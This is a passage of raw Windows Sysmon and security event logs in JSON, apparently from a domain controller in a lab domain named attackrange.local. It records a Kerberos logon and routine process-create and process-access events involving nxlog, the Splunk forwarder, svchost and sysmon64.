requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x5fd55","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52592","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.432\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.432","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nProcessGuid: {E2A3D6B1-1111-5F25-0000-0010AFFE0500}\r\nProcessId: 3144\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","ProcessGuid":"{E2A3D6B1-1111-5F25-0000-0010AFFE0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-0010AFFE0500}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-0010AFFE0500}","TargetProcessId":"3144","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-0010AFFE0500}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-0010AFFE0500}","TargetProcessId":"3144","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\